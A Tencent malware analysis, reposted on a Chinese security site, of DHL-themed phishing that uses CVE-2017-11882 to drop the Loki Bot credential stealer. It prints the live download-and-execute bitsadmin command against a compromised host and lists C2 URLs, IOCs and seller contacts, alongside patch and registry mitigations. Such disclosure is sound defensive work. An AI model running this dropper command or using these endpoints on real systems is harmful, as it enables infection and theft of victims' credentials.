0×1 背景

腾讯御见威胁情报中心监测发现,近期针对中国进出口企业的网络攻击再次抬头。黑客攻击的目标是中国电子科技、外贸、远洋运输企业,攻击者发送精心准备的与企业业务相关的诱饵邮件,附件是利用Office漏洞(漏洞编号:CVE-2017-11882)特别定制的攻击文档,存在漏洞的电脑上打开附件会立刻中毒。漏洞触发后利用bitsadmin下载Loki Bot木马并执行,然后窃取受害人员各类账号密码等机密信息。

2017年12月5号,腾讯安全御见情报中心曾发布预警:一款针对外贸行业的“商贸信”病毒,将利用CVE-2017-11882漏洞的Word文档伪装成采购清单、帐单等文件,通过邮件在全球外贸行业内大量传播,仅一天时间国内就有约10万多国内用户收到此类钓鱼邮件。

2018年2月26日捕获到doc文档样本通过下载并运行已被公开源码的“波尼”木马,窃取用户比特币钱包文件等敏感信息,这些攻击文档同样利用了CVE-2017-11882漏洞。

最新的拦截数据表明,此类定向投放到中国进出口企业的攻击邮件每天有上千封之多,病毒变种也层出不穷。腾讯安全专家建议中国进出口相关企业务必高度警惕,采用必要的防御措施防止企业机密信息泄露。

攻击流程:

1.png

0×2 具体分析

诱饵邮件为伪装成国际物流公司DHL发出的寄件包裹确认信。对于运输业的从业人员而言,此类邮件有相当高的诱导性,很容易被认定为运输合作伙伴的信件。

0505.jpg

内容直译:

3.png

附件doc内容:

 提示“Loading…”

02.png

空白图表

03.png

打开邮件doc文档,触发CVE-2017-11882漏洞,执行命令行

cmd.exe /c bitsadmin /transfer Fq /priority foreground hxxp://internationalcon.com/ar/home/eat.exe %USERPROFILE%/iWa.exe && start %USERPROFILE%/iWa.exe

bitsadmin.exe 可以用来在windows 命令行下下载文件,是windows 后台智能传输服务的一个工具,windows也会使用它来进行自动更新、下载补丁,此工具在黑客渗透攻击中也较为流行。

4.png

访问internationalcon.com发现该地址为阿联酋沙迦的某国际建筑设计公司网站,疑似被黑客攻击利用。

5.png

下载的exe样本采用aPLib加壳。nlo.exe为.net版;eat.exe为Delphi版,脱壳后都是“Loki Bot”木马。

6.png

7.png

“Loki Bot”是在地下网站上销售的商业恶意软件,功能为从受感染机器窃取私人数据,然后通过HTTP POST将该信息提交给控制主机。这些私人数据包括存储的密码,Web浏览器的登录凭证信息,以及各种加密货币钱包等。

8.png

装载功能:

启动(常驻装载机)

下载并运行(exe | dll)

下载和投递

更新木马

卸载木马

根据请求从控制端获取密码

加载到选定的国家

设置重新连接间隔

获取截图

支持的浏览器:

Internet Explorer

Mozilla Firefox (x32+x64)

Google Chrome

KMeleon

Comodo Dragon

Comodo IceDragon

SeaMonkey

Opera

Safari

CoolNovo

Rambler Nichrome

RockMelt

Baidu Spark

Chromium

Titan Browser

Torch Browser

Yandex.Browser

Epic Privacy Browser

Sleipnir Browser

Vivaldi

Coowon Browser

Superbird Browser

Chromodo Browser

Mustan Browser

360 Browser

Cyberfox (x32+x64)

Pale Moon

Maxthon browser

Citrio Browser

Chrome Canary

Waterfox

Orbitum

Iridium

支持的 FTP/VNC 客户端:

Total Commander

FlashFXP

FileZilla

FAR Manager

CyberDuck

Bitvise

NovaFTP

NetDrive

NppFTP

FTPShell

SherrodFTP

MyFTP

FTPBox

FtpInfo

Lines FTP

FullSync

Nexus File

JaSFtp

FTP Now

Xftp

Easy FTP

GoFTP

NETFile

Blaze Ftp

StaffFTP

DeluxeFTP

ALFTP

FTPGetter

WS_FTP

AbleFTp

Automize

RealVNC

TightVNC

Syncovery

mSecure Wallet

SmartFTP

FreshFTP

BitKinex

UltraFXP

FTP Rush

Vandyk SecureFX

OdinSecure FTP Expert

Fling

ClassicFTP

Maxthon browser

Kitty(login+private key)

WinSCP

Remmina RDP

WinFTP

32Bit FTP

FTP Navigator

支持的 Email 客户端:

Outlook (20032016)

Mozilla Thunderbird

Foxmail

Pocomail

Incredimail

Gmail Notifier Pro

SNetz Mailer

Checkmail

Opera Mail

FossaMail

MailSpeaker

yMail

支持的 IM 客户端:

Pidgin

密码管理工具:

EnPass

KeePass

1Password

AI RoboForm

获取MachineGuid

9.png

读取浏览器登录信息

10.png

支持的浏览器

11.png

读取浏览器.ini文件

12.png

读取SQLite数据库信息

13.png

读取FIP客户端文件信息

14.png

15.png

读取SMTP客户端信息

16.png

将获取的信息发送到C2地址hxxp://delamodegroup.com/mithcin/fre.php

17.png

0×3 溯源

通过腾讯御见威胁情报中心查询此次攻击的C2域名,发现这些域名都指向地址位于香港的IP:45.122.138.118

66.png

在某些C2域名上还保存有木马控制端的源码文件

19.png

20.png

从源码的数据库相关代码可以看到,木马服务端保存有日志,钱包,命令等数据表。

21.png

由于Loki Bot木马与Fareit家族木马、“波尼”木马在功能上有很大的相似之处,都是窃取用户的浏览器登录、邮件客户端等各类信息并上传,所以很容易混淆。但是我们发现在木马向C2进行POST上传数据都会带一个特殊字符“ckav.ru”

22.png

23.png

通过搜索引擎查找信息发现这是Loki Bot用来跟踪记录木马使用情况的特殊标记,疑似和俄罗斯地下黑客交易域名“xxckav.ru”有关。

24.png

进一步发现该软件的出售信息

展示界面:

25.png

价格: 80美元(不提供托管),100美元(提供托管一个月)

联系方式:

Jabber:  lokibotseller@thesecure.biz

ICQ:  823115

Skype: live:loki823115

作者使用与Skype账号对应的outlook邮箱loki823115@outlook.com

注册过域名gameirntplc.com登记国家显示为尼日利亚。

26.png

0×4 安全建议

1. 安装漏洞补丁:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

2. 禁用公式编辑器组件:

a) 可以通过运行如下命令禁用Office编辑器:

reg add"HKLMSOFTWAREMicrosoftOfficeCommonCOMCompatibility{0002CE02-0000-0000-C000-000000000046}" /v"Compatibility Flags" /t REG_DWORD /d 0x400

b) 对于 x64 OS 中的32位Microsoft Office 软件包, 运行以下命令:

reg add"HKLMSOFTWAREWow6432NodeMicrosoftOfficeCommonCOM  Compatibility{0002CE02-0000-0000-C000-000000000046}"/v "Compatibility Flags" /t REG_DWORD /d 0x400

3. 推荐企业内网使用腾讯御点终端安全管理系统(下载地址:https://s.tencent.com/product/yd/index.html)防御病毒木马威胁。

0404.png

4. 企业网管,可以为防火墙新增IOCs里ip和url的拦截。

0×5 IOCs

IP:

52.50.65.32

45.122.138.118

66.96.149.28

域名:

internationalcon.com

enerrpac.com

phcc-india.com

grantis.us

baidudownload.com

kaokao-twn.com

anguiillanet.com

mclhk-net.com

oliverrbatlle.com

anchormarineqroup.com

xemontdsd.xyz

delamodegroup.com

geranntibankasi.com

C2:

hxxp://anguiillanet.com/freeme/fre.php

hxxp://kaokao-twn.com/exploitedreal/fre.php

hxxp://grantis.us/metuseller/fre.php

hxxp://oliverrbatlle.com/dprince/fre.php

hxxp://anguiillanet.com/timezone/fine/fre.php

hxxp://phcc-india.com/kcee/five/fre.php

hxxp://enerrpac.com/cmerise/fre.php

hxxp://phcc-india.com/house/five/fre.php

hxxp://enerrpac.com/faithour/fre.php

hxxp://oliverrbatlle.com/davido/fre.php

hxxp://mclhk-net.com/chanelstv/fre.php

hxxp://mclhk-net.com/amonia/fre.php

hxxp://geranntibankasi.com/corp/nel/fre.php

hxxp://oliverrbatlle.com/dbanj/fre.php

hxxp://xemontd.xyz/saixxy/fre.php

hxxp://grantis.us/metuseller/five/fre.php

hxxp://mclhk-net.com/hiswounds/fre.php

hxxp://oliverrbatlle.com/wizkid/fre.php

hxxp://baidudownload.com/targert/fre.php

hxxp://baidudownload.com/tempot/fre.php

hxxp://delamodegroup.com/sam101/fre.php

url:

hxxp://internationalcon.com/ar/jakuzo/fynoy/ste.exe

hxxp://internationalcon.com/ar/home/eat.exe

hxxp://internationalcon.com/ar/nlo.exe 

hxxp://internationalcon.com/ar/jakuzo/fynoy/olumain/djuk/press.exe 

hxxp://internationalcon.com/ar/jakuzo/fynoy/olumain/sam.exe

hxxp://internationalcon.com/ar/jakuzo/fynoy/ste.exe 

hxxp://internationalcon.com/assets/css/qaz.exe

hxxp://internationalcon.com/assets/fonts/cpanel/war.exe

md5:

4a4cbf00af97bb62c18c65be20e12374

6c7dbda205cc82870316e6e5721cdc04

8f112db3c8c43c6cf8eecb5319bf79bd

019ebf613d2ece1967fc2b4a2bdbb513

49fcb43c91d5cfcaaf492ff78b1fb497

67b506a1f11a0a49fd91e72d8ee16bf7

250a8f0e43f4da59102b815d30eb6635

7917c644bd60d0f063495b12653d1ccd

0196805b3b805d0fa2c9b4ab3f162cea

b60c179cbe88ef5f53a27adbb22d810e

01c13b6afa2e50913a782993a4fdc715

23ed4375e8c8c78975f3cf35bb01b54a

b5b95ad3373e9039614aa424876474c5

相关链接:

《危机四伏的Office高危漏洞CVE-2017-11882》

《“商贸信”病毒:外贸行业的梦魇》

《CVE-2017-11882漏洞新利用:下载波尼木马窃取加密货币钱包文件》

*本文作者:腾讯电脑管家,转载请注明来自FreeBuf.COM

发表评论

已有 4 条评论

  • y111111en  2018-06-06 回复 1楼

    羡慕管家能收到原始邮件的技术-by foxmail

    亮了(2)
  • MC.Qun  2018-06-06 回复 2楼

    羡慕管家能收到原始邮件的技术-by foxmail

    亮了(0)
  • 马化云  2018-06-06 回复 3楼

    贸易战结合网络战?

    亮了(0)
  • 333ye  2018-06-06 回复 4楼

    羡慕管家能收到原始邮件的技术-by hotmail

    亮了(0)
查看全文
如若内容造成侵权/违法违规/事实不符,请联系编程学习网邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

相关文章

  1. git 提交代码到代码库 命令

    1.git status 比对本地代码与代码库中的异同2.git add +修改(增加,删除)的文件路径3.git commit -m -"描述信息"4.git push将修改的内容推送到代码库...

    2024/5/8 14:52:28
  2. pcl常用小知识

    https://segmentfault.com/a/1190000007125502#articleHeader0 https://blog.csdn.net/coldplayplay/article/details/78650464...

    2024/5/8 17:46:55
  3. 【转】Kotlin 和 Checked Exception

    Kotlin 和 Checked Exception 最近 JetBrains 的 Kotlin 语言忽然成了热门话题。国内小编们传言说,Kotlin 取代了 Java,成为了 Android 的“钦定语言”,很多人听了之后热血沸腾。初学者们也开始注意到 Kotlin,问出各种“傻问题”,很“功利”的问题,比如“现在学 Kotlin 是…...

    2024/5/8 18:47:00
  4. preference_persistent属性

    Android preference android:persistent 属性presistent : true|falsefalse:不会保存界面的信息到sharepref true: 会自动保存数据到sharepreference中SharedPreferences spf = PreferenceManager.getDefaultSharedPreferences(getContext());Log.d(TAG," check is &…...

    2024/4/16 22:28:57
  5. asp.net简单新闻系统2-list.aspx

    这个几乎就跟作者的一模一样,只是我是用vs2005,作者用的是vs2003,只是简化了,因为有的我不懂什么意思.不知道是不是必须的 list.aspx源码如下: <%@ Page Language="C#" AutoEventWireup="true" CodeFile="list.aspx.cs" Inherits="…...

    2024/5/8 18:18:12
  6. Spring security与Shiro的区别

    文章目录Spring Security和Shiro的区别1.相同点2.不同点 Spring Security和Shiro的区别 1.相同点 ①认证功能 ②授权功能 ③加密功能 ④会话管理 ⑤缓存支持 ⑥rememberMe功能 … … 2.不同点 ①Spring Security是一个重量级的安全管理框架;Shiro则是一个轻量级的安全管理框架…...

    2024/5/8 13:50:29
  7. Spring Security Authentication Provider

    Spring Security Authentication Provider 介绍 本文介绍spring security如何相比简单的UserDetailService上实现灵活的认证。 Authentication Provider spring security提供了多种执行认证方式,但都遵循一个简单的约定——AuthenticationProvider处理认证请求,然后返回授信后…...

    2024/5/8 15:22:24
  8. 文件夹或者文件比对工具 Beyond Compare

    文件夹或者文件比对工具 Beyond Compare之前有同事离职了。没有工作交接。同事的代码有一部分也没有提交版本库。结果就是线上的代码和版本库中的文件数量和代码内容不一致。这时就需要进行两方比对,查找不一致的地方。如果人工用肉眼进行比对查找,工作量会比较大,还极容易出…...

    2024/4/20 6:51:12
  9. hdfs dfs 命令

    注:hadoop fs 命令与hdfs dfs命令基本相同,单hadoop fs命令可以导jar包 可输入hdfs dfs 查找可输入的命令 例:hdfs dfs -cat /a.txt命令 说明[-appendToFile <localsrc> ... <dst>] 将本地文件localsrc追加到hdfs的dst文件中,如果dst文件不存在,则创建。[-cat…...

    2024/5/8 12:02:58
  10. Linux学习基础文章2:Linux必学的60个命令

    Linux提供了大量的命令,利用它可以有效地完成大量的工 作,如磁盘操作、文件存取、目录操作、进程管理、文件权限设定等。所以,在Linux系统上工作离不开使用系统提供的命令。要想真正理解Linux系统, 就必须从Linux命令学起,通过基础的命令学习可以进一步理解Linux系统。不同…...

    2024/5/8 16:24:20
  11. Kotlin的2017年总结与2018年展望

    \看新闻很累?看技术新闻更累?试试下载InfoQ手机客户端,每天上下班路上听新闻,有趣还有料!\\\自JetBrains于2017年3月发布Kotlin 1.1以来,Kotlin在全球范围内成长显著。 2017年有许多激动人心的发布,2018年以来这种势头丝毫不减。InfoQ最近与JetBrains开发者支持组组长Ha…...

    2024/5/9 1:33:27
  12. Kotlin从入门到夺门而出(1) - 开坑篇

    前言即日, Kotlin从入门到夺门而出系列正式开坑了,唯一希望的是我能够填完整个坑。 本篇为开坑篇,主要从以下几个方面出发,解答正在踌躇徘徊的人的疑惑,也是为了完整的引人入坑。 - 什么是kotlin? - kotlin在能取代Java吗? - 为什么要学习kotlin? - 我该如何学习k…...

    2024/5/9 3:57:31
  13. Spring Security教程(三)

    在上一篇博客中讲解了用Spring Security自带的默认数据库存储用户和权限的数据,但是Spring Security默认提供的表结构太过简单了,其实就算默认提供的表结构很复杂,也不一定能满足项目对用户信息和权限信息管理的要求。那么接下来就讲解如何自定义数据库实现对用户信息和权限…...

    2024/5/8 21:32:55
  14. 使用可靠的I2C代码

    现有的STM32的I2C代码,由于没有使用STM32官方推荐的DMA+I2C中断优先级最高的方式,总感觉用着不放心。想要修改,却又不知道如何改是更好地。于是想查找I2C驱动部分处理的好的代码,参照将现有I2C部分程序重构下。在查找了一些代码库文件后,比对了现有的I2C程序,发现EFM32的…...

    2024/4/16 22:29:45
  15. Android---多个Activity之间SharedPreference的共享

    记录一下,今天的坑。关于sharedpreference在不同activity之间的共享。下面这个是在网上看到的一篇https://www.cnblogs.com/xieyuan/p/3787405.html自己写了一个是用的PreferenceManager来获取的。Activity A:@Override public void onClick(View view) {SharedPreferences.Ed…...

    2024/4/17 23:19:00
  16. Redmine - 用rails开发的项目管理系统

    Redmine - 用rails开发的项目管理系统Redmine是一个用rails开发的项目管理系统。他的界面简洁,功能丰富。 它的主页是:http://www.redmine.org/ 在是一个demo网站:http://demo.redmine.org/ 他的主要功能有: * 可以支持多个项目的管理 * 基于角色的灵活的权限管理…...

    2024/4/16 22:28:51
  17. 【流畅的python】笔记(P1序幕)自测知识点和书籍补充

    文章目录C1 py数据模型1.1 一摞Python风格的纸牌__getitem__用法ps:namedtuple1.2 如何使用特殊方法自测答案1.2.2 字符串表示形式自测答案1.3 特殊方法一览自测答案1.4 为什么 len 不是普通方法自测答案 希望看完这本书写的代码好看~~ C1 py数据模型 py中下划线1.1 一摞…...

    2024/4/16 22:29:58
  18. 懒人日报 | 新西兰承认比特币收入合法、公链最终面临洗牌盘整万链归一、印度最大私营集团将推出区块链网络......

    海外动态【印度最大私营集团Reliance Industries子公司将在1年内推出区块链网络】 印度最大私营集团Reliance Industries(信实工业公司)的子公司Reliance Jio今天宣布与微软建立长达10年的合作伙伴关系,并将在未来12个月内推出“世界上最大的区块链网络之一”。另外,Relian…...

    2024/5/8 13:22:09
  19. Kotlin 学习笔记(一)—— 概述、学习曲线、开发工具、参考资料

    Kotlin学习笔记系列教程Kotlin 学习笔记(一)—— 概述、学习曲线、开发工具、参考资料1. Kotlin 概述简介Kotlin 是一门支持多范式、多平台的现代静态编程语言。Kotlin 支持面向对象、泛型与函数式等编程范式,它支持 JVM、Android、JavaScript 目标平台,而原生(Native)平…...

    2024/4/16 22:30:15
  20. JDBC+Servlet+JSP实现基本的增删改查(简易通讯录)

    前言:最近学习JavaWeb的过程中,自己实践练手了几个小项目,目前已经上传到我的Github上https://github.com/Snailclimb/JavaWebProject。目前只上传了3个项目。后面还会上传一些SSH,SSM的项目。图书管理系统的项目是参考慕课网做的,在它的基础上做了很大的改善增加了程序健…...

    2024/4/20 1:35:07

最新文章

  1. IT项目管理-简答题【太原理工大学】

    简答题出两道&#xff0c;共10分&#xff0c;以下是个人认为可能会出的&#xff0c;浅背 &#xff08;个人认为这部分不太重要&#xff0c;分值不大&#xff0c;大概上去说两句也能拿分&#xff0c;要考研或者有自己安排的同学可以把这部分放一下&#xff09; 1&#xff09;项目…...

    2024/5/9 4:02:02
  2. 梯度消失和梯度爆炸的一些处理方法

    在这里是记录一下梯度消失或梯度爆炸的一些处理技巧。全当学习总结了如有错误还请留言&#xff0c;在此感激不尽。 权重和梯度的更新公式如下&#xff1a; w w − η ⋅ ∇ w w w - \eta \cdot \nabla w ww−η⋅∇w 个人通俗的理解梯度消失就是网络模型在反向求导的时候出…...

    2024/5/7 10:36:02
  3. 24 个Intellij IDEA好用插件

    24 个Intellij IDEA好用插件 一. 安装插件 Codota 代码智能提示插件 只要打出首字母就能联想出一整条语句&#xff0c;这也太智能了&#xff0c;还显示了每条语句使用频率。 原因是它学习了我的项目代码&#xff0c;总结出了我的代码偏好。 Key Promoter X 快捷键提示插件 …...

    2024/5/4 10:14:12
  4. Redis的基本操作

    基本操作 redis默认开启16个数据库&#xff0c;默认使用第0个&#xff0c;可以使用select命令切换。 select index # 切换数据库查看当前数据库内所有键值 keys *清空数据库 flushdb # 清空当前数据库 flushall # 清空所有数据库设置键值对 set key value删除键值对 del …...

    2024/5/7 7:37:56
  5. 【外汇早评】美通胀数据走低,美元调整

    原标题:【外汇早评】美通胀数据走低,美元调整昨日美国方面公布了新一期的核心PCE物价指数数据,同比增长1.6%,低于前值和预期值的1.7%,距离美联储的通胀目标2%继续走低,通胀压力较低,且此前美国一季度GDP初值中的消费部分下滑明显,因此市场对美联储后续更可能降息的政策…...

    2024/5/8 6:01:22
  6. 【原油贵金属周评】原油多头拥挤,价格调整

    原标题:【原油贵金属周评】原油多头拥挤,价格调整本周国际劳动节,我们喜迎四天假期,但是整个金融市场确实流动性充沛,大事频发,各个商品波动剧烈。美国方面,在本周四凌晨公布5月份的利率决议和新闻发布会,维持联邦基金利率在2.25%-2.50%不变,符合市场预期。同时美联储…...

    2024/5/7 9:45:25
  7. 【外汇周评】靓丽非农不及疲软通胀影响

    原标题:【外汇周评】靓丽非农不及疲软通胀影响在刚结束的周五,美国方面公布了新一期的非农就业数据,大幅好于前值和预期,新增就业重新回到20万以上。具体数据: 美国4月非农就业人口变动 26.3万人,预期 19万人,前值 19.6万人。 美国4月失业率 3.6%,预期 3.8%,前值 3…...

    2024/5/4 23:54:56
  8. 【原油贵金属早评】库存继续增加,油价收跌

    原标题:【原油贵金属早评】库存继续增加,油价收跌周三清晨公布美国当周API原油库存数据,上周原油库存增加281万桶至4.692亿桶,增幅超过预期的74.4万桶。且有消息人士称,沙特阿美据悉将于6月向亚洲炼油厂额外出售更多原油,印度炼油商预计将每日获得至多20万桶的额外原油供…...

    2024/5/7 14:25:14
  9. 【外汇早评】日本央行会议纪要不改日元强势

    原标题:【外汇早评】日本央行会议纪要不改日元强势近两日日元大幅走强与近期市场风险情绪上升,避险资金回流日元有关,也与前一段时间的美日贸易谈判给日本缓冲期,日本方面对汇率问题也避免继续贬值有关。虽然今日早间日本央行公布的利率会议纪要仍然是支持宽松政策,但这符…...

    2024/5/4 23:54:56
  10. 【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响

    原标题:【原油贵金属早评】欧佩克稳定市场,填补伊朗问题的影响近日伊朗局势升温,导致市场担忧影响原油供给,油价试图反弹。此时OPEC表态稳定市场。据消息人士透露,沙特6月石油出口料将低于700万桶/日,沙特已经收到石油消费国提出的6月份扩大出口的“适度要求”,沙特将满…...

    2024/5/4 23:55:05
  11. 【外汇早评】美欲与伊朗重谈协议

    原标题:【外汇早评】美欲与伊朗重谈协议美国对伊朗的制裁遭到伊朗的抗议,昨日伊朗方面提出将部分退出伊核协议。而此行为又遭到欧洲方面对伊朗的谴责和警告,伊朗外长昨日回应称,欧洲国家履行它们的义务,伊核协议就能保证存续。据传闻伊朗的导弹已经对准了以色列和美国的航…...

    2024/5/4 23:54:56
  12. 【原油贵金属早评】波动率飙升,市场情绪动荡

    原标题:【原油贵金属早评】波动率飙升,市场情绪动荡因中美贸易谈判不安情绪影响,金融市场各资产品种出现明显的波动。随着美国与中方开启第十一轮谈判之际,美国按照既定计划向中国2000亿商品征收25%的关税,市场情绪有所平复,已经开始接受这一事实。虽然波动率-恐慌指数VI…...

    2024/5/7 11:36:39
  13. 【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试

    原标题:【原油贵金属周评】伊朗局势升温,黄金多头跃跃欲试美国和伊朗的局势继续升温,市场风险情绪上升,避险黄金有向上突破阻力的迹象。原油方面稍显平稳,近期美国和OPEC加大供给及市场需求回落的影响,伊朗局势并未推升油价走强。近期中美贸易谈判摩擦再度升级,美国对中…...

    2024/5/4 23:54:56
  14. 【原油贵金属早评】市场情绪继续恶化,黄金上破

    原标题:【原油贵金属早评】市场情绪继续恶化,黄金上破周初中国针对于美国加征关税的进行的反制措施引发市场情绪的大幅波动,人民币汇率出现大幅的贬值动能,金融市场受到非常明显的冲击。尤其是波动率起来之后,对于股市的表现尤其不安。隔夜美国股市出现明显的下行走势,这…...

    2024/5/6 1:40:42
  15. 【外汇早评】美伊僵持,风险情绪继续升温

    原标题:【外汇早评】美伊僵持,风险情绪继续升温昨日沙特两艘油轮再次发生爆炸事件,导致波斯湾局势进一步恶化,市场担忧美伊可能会出现摩擦生火,避险品种获得支撑,黄金和日元大幅走强。美指受中美贸易问题影响而在低位震荡。继5月12日,四艘商船在阿联酋领海附近的阿曼湾、…...

    2024/5/4 23:54:56
  16. 【原油贵金属早评】贸易冲突导致需求低迷,油价弱势

    原标题:【原油贵金属早评】贸易冲突导致需求低迷,油价弱势近日虽然伊朗局势升温,中东地区几起油船被袭击事件影响,但油价并未走高,而是出于调整结构中。由于市场预期局势失控的可能性较低,而中美贸易问题导致的全球经济衰退风险更大,需求会持续低迷,因此油价调整压力较…...

    2024/5/8 20:48:49
  17. 氧生福地 玩美北湖(上)——为时光守候两千年

    原标题:氧生福地 玩美北湖(上)——为时光守候两千年一次说走就走的旅行,只有一张高铁票的距离~ 所以,湖南郴州,我来了~ 从广州南站出发,一个半小时就到达郴州西站了。在动车上,同时改票的南风兄和我居然被分到了一个车厢,所以一路非常愉快地聊了过来。 挺好,最起…...

    2024/5/7 9:26:26
  18. 氧生福地 玩美北湖(中)——永春梯田里的美与鲜

    原标题:氧生福地 玩美北湖(中)——永春梯田里的美与鲜一觉醒来,因为大家太爱“美”照,在柳毅山庄去寻找龙女而错过了早餐时间。近十点,向导坏坏还是带着饥肠辘辘的我们去吃郴州最富有盛名的“鱼头粉”。说这是“十二分推荐”,到郴州必吃的美食之一。 哇塞!那个味美香甜…...

    2024/5/4 23:54:56
  19. 氧生福地 玩美北湖(下)——奔跑吧骚年!

    原标题:氧生福地 玩美北湖(下)——奔跑吧骚年!让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 让我们红尘做伴 活得潇潇洒洒 策马奔腾共享人世繁华 对酒当歌唱出心中喜悦 轰轰烈烈把握青春年华 啊……啊……啊 两…...

    2024/5/8 19:33:07
  20. 扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!

    原标题:扒开伪装医用面膜,翻六倍价格宰客,小姐姐注意了!扒开伪装医用面膜,翻六倍价格宰客!当行业里的某一品项火爆了,就会有很多商家蹭热度,装逼忽悠,最近火爆朋友圈的医用面膜,被沾上了污点,到底怎么回事呢? “比普通面膜安全、效果好!痘痘、痘印、敏感肌都能用…...

    2024/5/5 8:13:33
  21. 「发现」铁皮石斛仙草之神奇功效用于医用面膜

    原标题:「发现」铁皮石斛仙草之神奇功效用于医用面膜丽彦妆铁皮石斛医用面膜|石斛多糖无菌修护补水贴19大优势: 1、铁皮石斛:自唐宋以来,一直被列为皇室贡品,铁皮石斛生于海拔1600米的悬崖峭壁之上,繁殖力差,产量极低,所以古代仅供皇室、贵族享用 2、铁皮石斛自古民间…...

    2024/5/8 20:38:49
  22. 丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者

    原标题:丽彦妆\医用面膜\冷敷贴轻奢医学护肤引导者【公司简介】 广州华彬企业隶属香港华彬集团有限公司,专注美业21年,其旗下品牌: 「圣茵美」私密荷尔蒙抗衰,产后修复 「圣仪轩」私密荷尔蒙抗衰,产后修复 「花茵莳」私密荷尔蒙抗衰,产后修复 「丽彦妆」专注医学护…...

    2024/5/4 23:54:58
  23. 广州械字号面膜生产厂家OEM/ODM4项须知!

    原标题:广州械字号面膜生产厂家OEM/ODM4项须知!广州械字号面膜生产厂家OEM/ODM流程及注意事项解读: 械字号医用面膜,其实在我国并没有严格的定义,通常我们说的医美面膜指的应该是一种「医用敷料」,也就是说,医用面膜其实算作「医疗器械」的一种,又称「医用冷敷贴」。 …...

    2024/5/6 21:42:42
  24. 械字号医用眼膜缓解用眼过度到底有无作用?

    原标题:械字号医用眼膜缓解用眼过度到底有无作用?医用眼膜/械字号眼膜/医用冷敷眼贴 凝胶层为亲水高分子材料,含70%以上的水分。体表皮肤温度传导到本产品的凝胶层,热量被凝胶内水分子吸收,通过水分的蒸发带走大量的热量,可迅速地降低体表皮肤局部温度,减轻局部皮肤的灼…...

    2024/5/4 23:54:56
  25. 配置失败还原请勿关闭计算机,电脑开机屏幕上面显示,配置失败还原更改 请勿关闭计算机 开不了机 这个问题怎么办...

    解析如下&#xff1a;1、长按电脑电源键直至关机&#xff0c;然后再按一次电源健重启电脑&#xff0c;按F8健进入安全模式2、安全模式下进入Windows系统桌面后&#xff0c;按住“winR”打开运行窗口&#xff0c;输入“services.msc”打开服务设置3、在服务界面&#xff0c;选中…...

    2022/11/19 21:17:18
  26. 错误使用 reshape要执行 RESHAPE,请勿更改元素数目。

    %读入6幅图像&#xff08;每一幅图像的大小是564*564&#xff09; f1 imread(WashingtonDC_Band1_564.tif); subplot(3,2,1),imshow(f1); f2 imread(WashingtonDC_Band2_564.tif); subplot(3,2,2),imshow(f2); f3 imread(WashingtonDC_Band3_564.tif); subplot(3,2,3),imsho…...

    2022/11/19 21:17:16
  27. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机...

    win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”问题的解决方法在win7系统关机时如果有升级系统的或者其他需要会直接进入一个 等待界面&#xff0c;在等待界面中我们需要等待操作结束才能关机&#xff0c;虽然这比较麻烦&#xff0c;但是对系统进行配置和升级…...

    2022/11/19 21:17:15
  28. 台式电脑显示配置100%请勿关闭计算机,“准备配置windows 请勿关闭计算机”的解决方法...

    有不少用户在重装Win7系统或更新系统后会遇到“准备配置windows&#xff0c;请勿关闭计算机”的提示&#xff0c;要过很久才能进入系统&#xff0c;有的用户甚至几个小时也无法进入&#xff0c;下面就教大家这个问题的解决方法。第一种方法&#xff1a;我们首先在左下角的“开始…...

    2022/11/19 21:17:14
  29. win7 正在配置 请勿关闭计算机,怎么办Win7开机显示正在配置Windows Update请勿关机...

    置信有很多用户都跟小编一样遇到过这样的问题&#xff0c;电脑时发现开机屏幕显现“正在配置Windows Update&#xff0c;请勿关机”(如下图所示)&#xff0c;而且还需求等大约5分钟才干进入系统。这是怎样回事呢&#xff1f;一切都是正常操作的&#xff0c;为什么开时机呈现“正…...

    2022/11/19 21:17:13
  30. 准备配置windows 请勿关闭计算机 蓝屏,Win7开机总是出现提示“配置Windows请勿关机”...

    Win7系统开机启动时总是出现“配置Windows请勿关机”的提示&#xff0c;没过几秒后电脑自动重启&#xff0c;每次开机都这样无法进入系统&#xff0c;此时碰到这种现象的用户就可以使用以下5种方法解决问题。方法一&#xff1a;开机按下F8&#xff0c;在出现的Windows高级启动选…...

    2022/11/19 21:17:12
  31. 准备windows请勿关闭计算机要多久,windows10系统提示正在准备windows请勿关闭计算机怎么办...

    有不少windows10系统用户反映说碰到这样一个情况&#xff0c;就是电脑提示正在准备windows请勿关闭计算机&#xff0c;碰到这样的问题该怎么解决呢&#xff0c;现在小编就给大家分享一下windows10系统提示正在准备windows请勿关闭计算机的具体第一种方法&#xff1a;1、2、依次…...

    2022/11/19 21:17:11
  32. 配置 已完成 请勿关闭计算机,win7系统关机提示“配置Windows Update已完成30%请勿关闭计算机”的解决方法...

    今天和大家分享一下win7系统重装了Win7旗舰版系统后&#xff0c;每次关机的时候桌面上都会显示一个“配置Windows Update的界面&#xff0c;提示请勿关闭计算机”&#xff0c;每次停留好几分钟才能正常关机&#xff0c;导致什么情况引起的呢&#xff1f;出现配置Windows Update…...

    2022/11/19 21:17:10
  33. 电脑桌面一直是清理请关闭计算机,windows7一直卡在清理 请勿关闭计算机-win7清理请勿关机,win7配置更新35%不动...

    只能是等着&#xff0c;别无他法。说是卡着如果你看硬盘灯应该在读写。如果从 Win 10 无法正常回滚&#xff0c;只能是考虑备份数据后重装系统了。解决来方案一&#xff1a;管理员运行cmd&#xff1a;net stop WuAuServcd %windir%ren SoftwareDistribution SDoldnet start WuA…...

    2022/11/19 21:17:09
  34. 计算机配置更新不起,电脑提示“配置Windows Update请勿关闭计算机”怎么办?

    原标题&#xff1a;电脑提示“配置Windows Update请勿关闭计算机”怎么办&#xff1f;win7系统中在开机与关闭的时候总是显示“配置windows update请勿关闭计算机”相信有不少朋友都曾遇到过一次两次还能忍但经常遇到就叫人感到心烦了遇到这种问题怎么办呢&#xff1f;一般的方…...

    2022/11/19 21:17:08
  35. 计算机正在配置无法关机,关机提示 windows7 正在配置windows 请勿关闭计算机 ,然后等了一晚上也没有关掉。现在电脑无法正常关机...

